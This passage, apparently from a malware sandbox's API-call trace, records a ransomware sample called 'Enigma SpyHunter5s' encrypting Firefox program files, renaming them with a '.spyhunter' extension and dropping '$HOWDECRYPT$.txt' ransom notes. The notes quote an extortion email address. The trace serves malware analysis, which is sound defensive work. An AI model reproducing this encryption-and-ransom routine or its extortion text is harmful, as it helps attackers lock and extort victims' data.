lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6ec*=0x30, lpOverlapped=0x0) returned 1 [0163.814] CloseHandle (hObject=0xa0) returned 1 [0163.814] GetProcessHeap () returned 0x2c0000 [0163.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.814] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list.spyhunter") returned 71 [0163.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list.spyhunter")) returned 1 [0163.815] GetProcessHeap () returned 0x2c0000 [0163.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.815] GetProcessHeap () returned 0x2c0000 [0163.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.815] GetProcessHeap () returned 0x2c0000 [0163.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5948 | out: hHeap=0x2c0000) returned 1 [0163.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.816] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0163.816] WriteFile (in: hFile=0xa0, lpBuffer=0x248e663*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e78c, lpOverlapped=0x0 | out: lpBuffer=0x248e663*, lpNumberOfBytesWritten=0x248e78c*=0x127, lpOverlapped=0x0) returned 1 [0163.823] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0163.823] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e78c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e78c*=0x2ac, lpOverlapped=0x0) returned 1 [0163.824] CloseHandle (hObject=0xa0) returned 1 [0163.824] GetProcessHeap () returned 0x2c0000 [0163.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ec10 | out: hHeap=0x2c0000) returned 1 [0163.824] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.824] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0163.824] WriteFile (in: hFile=0xa0, lpBuffer=0x248e65f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e788, lpOverlapped=0x0 | out: lpBuffer=0x248e65f*, lpNumberOfBytesWritten=0x248e788*=0x127, lpOverlapped=0x0) returned 1 [0163.825] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0163.825] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e788, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e788*=0x2ac, lpOverlapped=0x0) returned 1 [0163.825] CloseHandle (hObject=0xa0) returned 1 [0163.826] GetProcessHeap () returned 0x2c0000 [0163.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5970 | out: hHeap=0x2c0000) returned 1 [0163.826] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e728 | out: pbBuffer=0x248e728) returned 1 [0163.826] GetProcessHeap () returned 0x2c0000 [0163.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.826] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e720*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e720*=0x30) returned 1 [0163.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\channel-prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.826] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js") returned 73 [0163.826] StrStrW (lpFirst="channel-prefs.js", lpSrch=".txt") returned 0x0 [0163.826] GetProcessHeap () returned 0x2c0000 [0163.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0163.827] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e6e4*=0x166, lpOverlapped=0x0) returned 1 [0163.827] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.827] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x166, lpNumberOfBytesWritten=0x248e6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e6e4*=0x166, lpOverlapped=0x0) returned 1 [0163.827] GetProcessHeap () returned 0x2c0000 [0163.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0163.828] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.828] WriteFile (in: hFile=0xa0, lpBuffer=0x248e724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6e4, lpOverlapped=0x0 | out: lpBuffer=0x248e724*, lpNumberOfBytesWritten=0x248e6e4*=0x4, lpOverlapped=0x0) returned 1 [0163.828] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6e4*=0x30, lpOverlapped=0x0) returned 1 [0163.828] CloseHandle (hObject=0xa0) returned 1 [0163.828] GetProcessHeap () returned 0x2c0000 [0163.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.828] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js.spyhunter") returned 83 [0163.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\channel-prefs.js"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\channel-prefs.js.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\defaults\\pref\\channel-prefs.js.spyhunter")) returned 1 [0163.829] GetProcessHeap () returned 0x2c0000 [0163.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.829] GetProcessHeap () returned 0x2c0000 [0163.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.829] GetProcessHeap () returned 0x2c0000 [0163.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5890 | out: hHeap=0x2c0000) returned 1 [0163.829] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e720 | out: pbBuffer=0x248e720) returned 1 [0163.829] GetProcessHeap () returned 0x2c0000 [0163.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.829] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e718*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e718*=0x30) returned 1 [0163.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\d3dcompiler_43.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.830] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll") returned 61 [0163.830] StrStrW (lpFirst="D3DCompiler_43.dll", lpSrch=".txt") returned 0x0 [0163.830] GetProcessHeap () returned 0x2c0000 [0163.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0163.830] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e6dc*=0x2800, lpOverlapped=0x0) returned 1 [0163.831] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.831] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e6dc*=0x2800, lpOverlapped=0x0) returned 1 [0163.831] GetProcessHeap () returned 0x2c0000 [0163.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0163.832] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.832] WriteFile (in: hFile=0xa0, lpBuffer=0x248e71c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6dc, lpOverlapped=0x0 | out: lpBuffer=0x248e71c*, lpNumberOfBytesWritten=0x248e6dc*=0x4, lpOverlapped=0x0) returned 1 [0163.845] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6dc*=0x30, lpOverlapped=0x0) returned 1 [0163.845] CloseHandle (hObject=0xa0) returned 1 [0163.845] GetProcessHeap () returned 0x2c0000 [0163.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.845] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll.spyhunter") returned 71 [0163.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\d3dcompiler_43.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\d3dcompiler_43.dll.spyhunter")) returned 1 [0163.846] GetProcessHeap () returned 0x2c0000 [0163.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.846] GetProcessHeap () returned 0x2c0000 [0163.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.846] GetProcessHeap () returned 0x2c0000 [0163.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5880 | out: hHeap=0x2c0000) returned 1 [0163.846] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e720 | out: pbBuffer=0x248e720) returned 1 [0163.846] GetProcessHeap () returned 0x2c0000 [0163.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e718*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e718*=0x30) returned 1 [0163.846] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.847] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe") returned 60 [0163.847] StrStrW (lpFirst="crashreporter.exe", lpSrch=".txt") returned 0x0 [0163.847] GetProcessHeap () returned 0x2c0000 [0163.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0163.847] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e6dc*=0x2800, lpOverlapped=0x0) returned 1 [0163.848] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.848] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e6dc*=0x2800, lpOverlapped=0x0) returned 1 [0163.848] GetProcessHeap () returned 0x2c0000 [0163.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0163.848] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.849] WriteFile (in: hFile=0xa0, lpBuffer=0x248e71c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6dc, lpOverlapped=0x0 | out: lpBuffer=0x248e71c*, lpNumberOfBytesWritten=0x248e6dc*=0x4, lpOverlapped=0x0) returned 1 [0163.849] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6dc*=0x30, lpOverlapped=0x0) returned 1 [0163.849] CloseHandle (hObject=0xa0) returned 1 [0163.849] GetProcessHeap () returned 0x2c0000 [0163.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.850] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.spyhunter") returned 70 [0163.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe.spyhunter")) returned 1 [0163.850] GetProcessHeap () returned 0x2c0000 [0163.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.850] GetProcessHeap () returned 0x2c0000 [0163.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.851] GetProcessHeap () returned 0x2c0000 [0163.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec56f0 | out: hHeap=0x2c0000) returned 1 [0163.851] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.851] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0163.851] WriteFile (in: hFile=0xa0, lpBuffer=0x248e64f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e778, lpOverlapped=0x0 | out: lpBuffer=0x248e64f*, lpNumberOfBytesWritten=0x248e778*=0x127, lpOverlapped=0x0) returned 1 [0163.852] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0163.852] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e778, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e778*=0x2ac, lpOverlapped=0x0) returned 1 [0163.852] CloseHandle (hObject=0xa0) returned 1 [0163.852] GetProcessHeap () returned 0x2c0000 [0163.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06668 | out: hHeap=0x2c0000) returned 1 [0163.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.853] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0163.853] WriteFile (in: hFile=0xa0, lpBuffer=0x248e64b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e774, lpOverlapped=0x0 | out: lpBuffer=0x248e64b*, lpNumberOfBytesWritten=0x248e774*=0x127, lpOverlapped=0x0) returned 1 [0163.854] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0163.854] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e774, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e774*=0x2ac, lpOverlapped=0x0) returned 1 [0163.855] CloseHandle (hObject=0xa0) returned 1 [0163.856] GetProcessHeap () returned 0x2c0000 [0163.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf280 | out: hHeap=0x2c0000) returned 1 [0163.856] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e710 | out: pbBuffer=0x248e710) returned 1 [0163.856] GetProcessHeap () returned 0x2c0000 [0163.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.856] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e708*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e708*=0x30) returned 1 [0163.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\yahoo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.856] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml") returned 74 [0163.856] StrStrW (lpFirst="yahoo.xml", lpSrch=".txt") returned 0x0 [0163.856] GetProcessHeap () returned 0x2c0000 [0163.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0163.857] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e6cc*=0xa73, lpOverlapped=0x0) returned 1 [0163.978] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff58d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.979] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xa73, lpNumberOfBytesWritten=0x248e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e6cc*=0xa73, lpOverlapped=0x0) returned 1 [0163.979] GetProcessHeap () returned 0x2c0000 [0163.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0163.979] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.979] WriteFile (in: hFile=0xa0, lpBuffer=0x248e70c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6cc, lpOverlapped=0x0 | out: lpBuffer=0x248e70c*, 